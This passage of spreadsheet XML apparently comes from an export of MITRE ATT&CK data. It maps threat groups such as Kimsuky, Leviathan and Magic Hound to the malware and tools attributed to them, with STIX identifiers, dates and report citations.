    <t>(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>relationship--f9ca130a-1356-4a0a-9d38-ee7d2f9a51f6</t>
  </si>
  <si>
    <t>15 September 2021</t>
  </si>
  <si>
    <t>S0695</t>
  </si>
  <si>
    <t>Donut</t>
  </si>
  <si>
    <t>tool--a7b5df47-73bb-4d47-b701-869f185633a6</t>
  </si>
  <si>
    <t>(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--7e2dcce1-8fde-4f88-9e48-13a736c694e3</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>malware--f01e2711-4b48-4192-a2e8-5f56c945ca19</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)</t>
  </si>
  <si>
    <t>relationship--aa4ac94c-705e-4215-8d52-a97b583b62c5</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--8efc016b-af48-4cfd-a117-142a88b7c9d9</t>
  </si>
  <si>
    <t>29 January 2021</t>
  </si>
  <si>
    <t>relationship--8bdc51e7-d2fd-44fb-bfed-6767b6522405</t>
  </si>
  <si>
    <t>(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--a5b41632-a553-4abe-aa68-9ce6898e642d</t>
  </si>
  <si>
    <t>S0612</t>
  </si>
  <si>
    <t>WastedLocker</t>
  </si>
  <si>
    <t>malware--46cbafbc-8907-42d3-9002-5327c26f8927</t>
  </si>
  <si>
    <t>(Citation: NCC Group WastedLocker June 2020)(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>relationship--c0f58f34-8f30-4a21-9771-5656ad0f5900</t>
  </si>
  <si>
    <t>14 September 2021</t>
  </si>
  <si>
    <t>G0004</t>
  </si>
  <si>
    <t>Ke3chang</t>
  </si>
  <si>
    <t>intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--4cf4df8f-9eb3-4136-a082-ea1b5d7b398f</t>
  </si>
  <si>
    <t>S0280</t>
  </si>
  <si>
    <t>MirageFox</t>
  </si>
  <si>
    <t>malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d</t>
  </si>
  <si>
    <t>(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--695a988e-daa3-47d7-bf8d-3539ab992f80</t>
  </si>
  <si>
    <t>S0691</t>
  </si>
  <si>
    <t>Neoichor</t>
  </si>
  <si>
    <t>malware--4d7bf2ac-f953-4907-b114-be44dc174d67</t>
  </si>
  <si>
    <t>(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--9f1f9c0a-92c2-4517-bb04-db232421284a</t>
  </si>
  <si>
    <t>(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--77f9936d-1ba7-42a8-879d-1a6e90156366</t>
  </si>
  <si>
    <t>01 November 2021</t>
  </si>
  <si>
    <t>S0439</t>
  </si>
  <si>
    <t>Okrum</t>
  </si>
  <si>
    <t>malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83</t>
  </si>
  <si>
    <t>(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--0ee0af6e-c913-406e-9439-f40f5102cae7</t>
  </si>
  <si>
    <t>07 May 2020</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--0d51acf9-f8df-42e1-aef3-4c86cf5ab17a</t>
  </si>
  <si>
    <t>relationship--301de16e-3829-4fb0-b217-dcdfca7398c9</t>
  </si>
  <si>
    <t>relationship--59223275-a57b-45ca-94b6-5c504165d8f9</t>
  </si>
  <si>
    <t>relationship--f879eea1-2a05-484d-adbb-c3504813fc5d</t>
  </si>
  <si>
    <t>relationship--325ccde0-2d5a-4306-9c4e-e1a554ee0d87</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>tool--33b9e38f-103c-412d-bdcf-904a91fff1e4</t>
  </si>
  <si>
    <t>relationship--47f580c1-77ea-48a6-a280-71bbcb4707d0</t>
  </si>
  <si>
    <t>G0094</t>
  </si>
  <si>
    <t>Kimsuky</t>
  </si>
  <si>
    <t>intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f</t>
  </si>
  <si>
    <t>S0622</t>
  </si>
  <si>
    <t>AppleSeed</t>
  </si>
  <si>
    <t>malware--295721d2-ee20-4fa3-ade3-37f4146b4570</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--7eb36f17-be21-4235-9a3b-736b17d089dc</t>
  </si>
  <si>
    <t>11 June 2021</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>malware--d1b7830a-fced-4be3-a99c-f495af9d9e1b</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--fba9610f-dbaa-4ded-b233-9229b80809ab</t>
  </si>
  <si>
    <t>04 November 2020</t>
  </si>
  <si>
    <t>S0252</t>
  </si>
  <si>
    <t>Brave Prince</t>
  </si>
  <si>
    <t>malware--28b97733-ef07-4414-aaa5-df50b2d30cc5</t>
  </si>
  <si>
    <t>(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--56996982-a954-44d6-9d99-c23d4babccc1</t>
  </si>
  <si>
    <t>S0527</t>
  </si>
  <si>
    <t>CSPY Downloader</t>
  </si>
  <si>
    <t>tool--5256c0f8-9108-4c92-8b09-482dfacdcd94</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--5a85a31a-f5dd-4058-87d3-bb0b6fcfffb3</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>Gold Dragon</t>
  </si>
  <si>
    <t>malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8</t>
  </si>
  <si>
    <t>relationship--a6d8c16f-7102-407c-ab9a-7d6b77f85413</t>
  </si>
  <si>
    <t>S0526</t>
  </si>
  <si>
    <t>KGH_SPY</t>
  </si>
  <si>
    <t>malware--8bdfe255-e658-4ddd-a11c-b854762e451d</t>
  </si>
  <si>
    <t>relationship--c257d040-c058-42db-ad75-1abb7b06e616</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--ec6d7edc-f538-41ce-89b6-a2c424ddd58b</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>NOKKI</t>
  </si>
  <si>
    <t>malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a</t>
  </si>
  <si>
    <t>relationship--926523b2-beb0-46e0-a610-c2948ea7bc66</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--b20c6b3c-1314-419e-afa2-28ac8f54cf39</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--23206fb2-51fb-4bdb-810d-4f719f7dead8</t>
  </si>
  <si>
    <t>09 November 2020</t>
  </si>
  <si>
    <t>G1004</t>
  </si>
  <si>
    <t>LAPSUS$</t>
  </si>
  <si>
    <t>intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--7e307ac4-f569-4606-a500-b5ead2d5967f</t>
  </si>
  <si>
    <t>S0584</t>
  </si>
  <si>
    <t>AppleJeus</t>
  </si>
  <si>
    <t>malware--e2d34c63-6f5a-41f5-86a2-e2380f27f858</t>
  </si>
  <si>
    <t>(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--d0076185-9619-4365-b74a-44f52cc92c79</t>
  </si>
  <si>
    <t>01 March 2021</t>
  </si>
  <si>
    <t>S0347</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>malware--24b4ce59-eaac-4c8b-8634-9b093b7ccd92</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--90073373-434c-403c-bbb1-779b25fccb3d</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
    <t>malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2</t>
  </si>
  <si>
    <t>(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--1c12b31e-7f17-4e00-a6b5-7eddb5828f34</t>
  </si>
  <si>
    <t>S0520</t>
  </si>
  <si>
    <t>BLINDINGCAN</t>
  </si>
  <si>
    <t>malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725</t>
  </si>
  <si>
    <t>(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>relationship--d927e540-e6b8-4ddb-8652-cd510fe285ed</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8</t>
  </si>
  <si>
    <t>(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--fa0622d6-2b58-476f-9c57-e629785b0415</t>
  </si>
  <si>
    <t>S0498</t>
  </si>
  <si>
    <t>Cryptoistic</t>
  </si>
  <si>
    <t>malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>relationship--e82e75df-12f9-4d95-b653-dd71a519524f</t>
  </si>
  <si>
    <t>S0497</t>
  </si>
  <si>
    <t>Dacls</t>
  </si>
  <si>
    <t>malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>relationship--79f7d5d7-acbf-4f7e-8530-2f7e637580cd</t>
  </si>
  <si>
    <t>S0567</t>
  </si>
  <si>
    <t>Dtrack</t>
  </si>
  <si>
    <t>malware--f8774023-8021-4ece-9aca-383ac89d2759</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Dtrack)</t>
  </si>
  <si>
    <t>relationship--3b24afd4-b13b-4c73-bb20-aeff4a44574c</t>
  </si>
  <si>
    <t>12 March 2021</t>
  </si>
  <si>
    <t>(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--b78b74a4-7fe3-4de5-9aba-b176f1929a7c</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>malware--fece06b7-d4b1-42cf-b81a-5323c917546e</t>
  </si>
  <si>
    <t>(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--216c15b0-3091-49f2-ba85-356d56265671</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>malware--bd0536d7-b081-43ae-a773-cfb057c5b988</t>
  </si>
  <si>
    <t>(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--64175a23-67fa-4fa6-8aa6-890c9dc3d5d8</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--35305a51-69ac-4fe2-b9e2-3c9a296e9f9b</t>
  </si>
  <si>
    <t>19 April 2019</t>
  </si>
  <si>
    <t>S0431</t>
  </si>
  <si>
    <t>HotCroissant</t>
  </si>
  <si>
    <t>malware--aad11e34-02ca-4220-91cd-2ed420af4db3</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>relationship--636c3816-21ed-46f7-8837-2334bed88e42</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22</t>
  </si>
  <si>
    <t>(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>relationship--7b18b0b1-1116-4e42-90b5-ffa3059955a7</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>malware--069af411-9b24-4e85-b26c-623d035bbe84</t>
  </si>
  <si>
    <t>(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--09c957e3-f89b-4b41-93af-bde08f00ce36</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c</t>
  </si>
  <si>
    <t>(Citation: Lazarus RATANKBA)</t>
  </si>
  <si>
    <t>relationship--ee02be12-0884-43dc-b0b4-aaaa306b1f19</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd</t>
  </si>
  <si>
    <t>28 July 2022</t>
  </si>
  <si>
    <t>relationship--ecfb4c82-5097-4273-8aeb-007922e92940</t>
  </si>
  <si>
    <t>S0586</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE</t>
  </si>
  <si>
    <t>malware--7f4bbe05-1674-4087-8a16-8f1ad61b6152</t>
  </si>
  <si>
    <t>(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--83e8bdc8-6fad-4b83-92de-2b66e3e9205e</t>
  </si>
  <si>
    <t>08 March 2021</t>
  </si>
  <si>
    <t>15 March 2021</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5</t>
  </si>
  <si>
    <t>(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--3933f2fa-9154-4ab4-b9cc-975a1dfbecf5</t>
  </si>
  <si>
    <t>20 December 2019</t>
  </si>
  <si>
    <t>S0665</t>
  </si>
  <si>
    <t>ThreatNeedle</t>
  </si>
  <si>
    <t>malware--16040b1c-ed28-4850-9d8f-bb8b81c42092</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>relationship--e29b85ff-9ae1-42ad-ba2e-53781b638e42</t>
  </si>
  <si>
    <t>01 December 2021</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>malware--495b6cdb-7b5a-4fbc-8d33-e7ef68806d08</t>
  </si>
  <si>
    <t>(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e46836e5-8ffe-45e5-9398-bb9fbb3a4aeb</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018)(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--25e7ca82-2784-433a-90a9-a3483615a655</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster Loaders)</t>
  </si>
  <si>
    <t>relationship--9f62c4e4-02d4-497b-8039-cc4e816386a5</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>tool--c11ac61d-50f4-444f-85d8-6f006067f0de</t>
  </si>
  <si>
    <t>relationship--d1e1fefe-5e60-463e-9fd3-bc5ca6d559ed</t>
  </si>
  <si>
    <t>07 February 2022</t>
  </si>
  <si>
    <t>G0140</t>
  </si>
  <si>
    <t>LazyScripter</t>
  </si>
  <si>
    <t>intrusion-set--abc5a1d4-f0dc-49d1-88a1-4a80e478bb03</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>relationship--ba2b3c40-f9d2-4663-a5bd-3bb158553572</t>
  </si>
  <si>
    <t>24 November 2021</t>
  </si>
  <si>
    <t>S0669</t>
  </si>
  <si>
    <t>KOCTOPUS</t>
  </si>
  <si>
    <t>malware--df9b350b-d4f9-4e79-a826-75cc75fbc1eb</t>
  </si>
  <si>
    <t>relationship--e6289aac-7035-465c-acc3-ad6963509ad4</t>
  </si>
  <si>
    <t>06 December 2021</t>
  </si>
  <si>
    <t>relationship--c7972596-a87d-48fd-bd6f-f140e16f99a6</t>
  </si>
  <si>
    <t>relationship--878ff6f7-d372-4559-a114-8858eb2682d4</t>
  </si>
  <si>
    <t>relationship--22d01d2c-6c2e-4e59-98ac-393aef16ffe3</t>
  </si>
  <si>
    <t>relationship--b3a2df5e-af39-4129-a63c-7dee0e5986bb</t>
  </si>
  <si>
    <t>relationship--b036723f-a215-4c04-a625-e57faac4d6b9</t>
  </si>
  <si>
    <t>G0077</t>
  </si>
  <si>
    <t>Leafminer</t>
  </si>
  <si>
    <t>intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74</t>
  </si>
  <si>
    <t>(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>relationship--022c1740-5adb-473e-a8b3-5b1646c959d8</t>
  </si>
  <si>
    <t>25 March 2019</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e</t>
  </si>
  <si>
    <t>relationship--a55d75ab-f5bb-4892-80de-c878be26a67d</t>
  </si>
  <si>
    <t>relationship--984a0d7f-407f-4e3b-afd5-1dc107a980d5</t>
  </si>
  <si>
    <t>relationship--d2a8729f-6271-46a0-8a40-a8567c9e5092</t>
  </si>
  <si>
    <t>G0065</t>
  </si>
  <si>
    <t>Leviathan</t>
  </si>
  <si>
    <t>intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e</t>
  </si>
  <si>
    <t>S0642</t>
  </si>
  <si>
    <t>BADFLICK</t>
  </si>
  <si>
    <t>malware--57d83eac-a2ea-42b0-a7b2-c80c55157790</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--6cccc84e-8b42-444c-8d18-12628b0e353c</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--3964d326-01f2-4142-8f41-408f576b53b4</t>
  </si>
  <si>
    <t>relationship--67003297-a35d-452f-b83b-34556115d15c</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--eb3a34dd-c516-44a6-9268-6464016bd14a</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--d8cbc56c-4014-4e59-adfd-1899859f01d4</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--4fe3f0a3-1330-4b51-be17-b38a54b6e605</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--732d754a-b02d-4ec6-8ba2-364c3a8510de</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>malware--7451bcf9-e6e6-4a70-bc3d-1599173d0035</t>
  </si>
  <si>
    <t>relationship--44add639-84c1-45e7-a640-bcc3ac2b12e1</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>malware--049ff071-0b3c-4712-95d2-d21c6aa54501</t>
  </si>
  <si>
    <t>relationship--bcdf2779-c5a2-40b3-88b6-0857711c1cfe</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>NanHaiShu</t>
  </si>
  <si>
    <t>malware--705f0783-5f7d-4491-b6b7-9628e6e006d2</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>relationship--d26e2b47-e474-402d-b3ff-423a8b64a68e</t>
  </si>
  <si>
    <t>(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>relationship--86f6e11c-759b-438d-9f32-004708c68f2c</t>
  </si>
  <si>
    <t>18 March 2019</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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G0030</t>
  </si>
  <si>
    <t>Lotus Blossom</t>
  </si>
  <si>
    <t>intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>malware--7551188b-8f91-4d34-8350-0d0c57b2b913</t>
  </si>
  <si>
    <t>(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>relationship--8859897c-66f5-4754-8cb8-2c6e6b8b8e2e</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1</t>
  </si>
  <si>
    <t>(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>relationship--764b5d56-83a1-4c8d-824a-2021c7fe8052</t>
  </si>
  <si>
    <t>G1014</t>
  </si>
  <si>
    <t>LuminousMoth</t>
  </si>
  <si>
    <t>intrusion-set--b7f627e2-0817-4cd5-8d50-e75f8aa85cc6</t>
  </si>
  <si>
    <t>(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)</t>
  </si>
  <si>
    <t>relationship--f2ab4a93-9b9f-4c14-a879-200c512d406f</t>
  </si>
  <si>
    <t>relationship--71485f5d-f685-403d-a0da-72acbae0f79e</t>
  </si>
  <si>
    <t>G0095</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>malware--35cd1d01-1ede-44d2-b073-a264d727bc04</t>
  </si>
  <si>
    <t>(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--f33b1a88-1c1c-4ea4-a1b3-f1198012e728</t>
  </si>
  <si>
    <t>13 September 2019</t>
  </si>
  <si>
    <t>G0059</t>
  </si>
  <si>
    <t>Magic Hound</t>
  </si>
  <si>
    <t>intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13</t>
  </si>
  <si>
    <t>S0674</t>
  </si>
  <si>
    <t>CharmPower</t>
  </si>
  <si>
    <t>malware--7acb15b6-fe2c-4319-b136-6ab36ff0b2d4</t>
  </si>
  <si>
    <t>(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--501cd276-7cb4-40a6-b8be-d6cc6d743edc</t>
  </si>
  <si>
    <t>25 January 2022</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>malware--e48df773-7c95-4a4c-ba70-ea3d15900148</t>
  </si>
  <si>
    <t>(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--cf9f6e3b-b029-4edd-b53d-7f5981bd2302</t>
  </si>
  <si>
    <t>(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--205c5e6d-90c1-4369-98ee-9968f87d687c</t>
  </si>
  <si>
    <t>10 January 2023</t>
  </si>
  <si>
    <t>(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>relationship--67f2ca97-5949-4503-a55c-1f0d3f3502ca</t>
  </si>
  <si>
    <t>(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)</t>
  </si>
  <si>
    <t>relationship--1b255a88-0189-4afa-a69f-fa99127e693e</t>
  </si>
  <si>
    <t>25 May 2022</t>
  </si>
  <si>
    <t>05 January 2023</t>
  </si>
  <si>
    <t>relationship--27c6ffb3-836c-4a43-9862-b77c8e4a8256</t>
  </si>
  <si>
    <t>S1012</t>
  </si>
  <si>
    <t>PowerLess</t>
  </si>
  <si>
    <t>malware--35ee9bf3-264b-4411-8a8f-b58cec8f35e4</t>
  </si>
  <si>
    <t>(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--cace8bcc-ab98-49b7-83c1-7b0b99022f02</t>
  </si>
  <si>
    <t>relationship--e1910051-019d-4594-ab9d-b588eb370ff2</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: Secureworks Cobalt Gypsy Feb 2017)</t>
  </si>
  <si>
    <t>relationship--cde73e1c-da81-4673-a161-49693b45cd48</t>
  </si>
  <si>
    <t>relationship--703694f1-755e-4e3f-aff2-f623ec842693</t>
  </si>
  <si>
    <t>relationship--7f32b01c-ecf6-457e-8bca-6c74c02b439e</t>
  </si>
  <si>
    <t>(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>relationship--9f5f1262-17a7-443e-a531-c9048a91ac8d</t>
  </si>
  <si>
    <t>26 May 2022</t>
  </si>
  <si>
    <t>G1013</t>
  </si>
  <si>
    <t>Metador</t>
  </si>
  <si>
    <t>intrusion-set--bfc5ddb3-4dfb-4278-8928-020e1b3feddd</t>
  </si>
  <si>
    <t>S1060</t>
  </si>
  <si>
    <t>Mafalda</t>
  </si>
  <si>
    <t>malware--3be1fb7a-0f7e-415e-8e3a-74a80d596e68</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cc604330-0936-4292-bb45-40c1d865c27b</t>
  </si>
  <si>
    <t>S1059</t>
  </si>
  <si>
    <t>metaMain</t>
  </si>
  <si>
    <t>malware--df350889-4de9-44e5-8cb3-888b8343e97c</t>
  </si>
  <si>
    <t>relationship--bcdf1f9a-536d-4f86-a265-66b55ba0b7c7</t>
  </si>
  <si>
    <t>G0002</t>
  </si>
  <si>
    <t>Moafee</t>
  </si>
  <si>
    <t>intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f</t>
  </si>
  <si>
    <t>(Citation: Haq 2014)</t>
  </si>
  <si>
    <t>relationship--d6e40826-7af0-4e4e-96c3-28493abda6c7</t>
  </si>
  <si>
    <t>G0103</t>
  </si>
  <si>
    <t>Mofang</t>
  </si>
  <si>
    <t>intrusion-set--88489675-d216-4884-a98f-49a89fcc1643</t>
  </si>
  <si>
    <t>S0444</t>
  </si>
  <si>
    <t>ShimRat</t>
  </si>
  <si>
    <t>malware--5763217a-05b6-4edd-9bca-057e47b5e403</t>
  </si>
  <si>
    <t>relationship--6f82d8a7-d168-4e19-97d2-3950f0c649ce</t>
  </si>
  <si>
    <t>S0445</t>
  </si>
  <si>
    <t>ShimRatReporter</t>
  </si>
  <si>
    <t>tool--115f88dd-0618-4389-83cb-98d33ae81848</t>
  </si>
  <si>
    <t>relationship--69aa300b-3e31-438c-99bf-4822141046c5</t>
  </si>
  <si>
    <t>G0021</t>
  </si>
  <si>
    <t>Molerats</t>
  </si>
  <si>
    <t>intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411</t>
  </si>
  <si>
    <t>S0547</t>
  </si>
  <si>
    <t>DropBook</t>
  </si>
  <si>
    <t>malware--3ae6097d-d700-46c6-8b21-42fc0bcb48fa</t>
  </si>
  <si>
    <t>(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
